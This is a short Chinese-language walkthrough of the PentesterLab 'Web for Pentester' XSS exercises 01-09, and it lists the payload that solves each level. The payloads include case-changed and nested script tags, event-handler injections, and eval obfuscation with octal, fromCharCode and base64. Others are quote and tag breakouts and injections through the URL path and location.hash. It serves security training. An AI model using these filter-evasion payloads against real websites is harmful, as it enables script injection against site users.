Web for Pentester XSS Example 01-09

Ref：https://www.pentesterlab.com/exercises/web_for_pentester/

Dat：20140722

web for pentester是PentesterLib开发的众多渗透测试学习平台之一，通过该平台我们可以了解学习到常见的Web漏洞检测技术。

【Example 01】

无过滤

<script>alert(1)</script>

【Example 02】

大小写替换

<sCript>alert(1)</scRipt>

【Example 03】

多余属性

<script/b>alert(1)</script/a>
<sc<script>ript>alert(1)</scr</script>ipt>

【Example 04】

变换标签

<img onerror=alert(1) src=a>
<a onmouseover=alert(1)>
<div onmouseover=alert(1)>

【Example 05】

EVAL

<script>eval('a\154ert(1)')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>eval(atob('YWxlcnQoMSk='))</script>

标签变换+进制

<img onerror=al\u0065rt(1) src=a>

【Example 06】

标签闭合

";alert(1);"

【Example 07】

标签闭合

';alert(1);'

【Example 08】

标签form属性利用

example8.php/" ><script>alert(1)</script><"

【Example 09】

location.hash利用

example9.php#<script>alert(1)</script>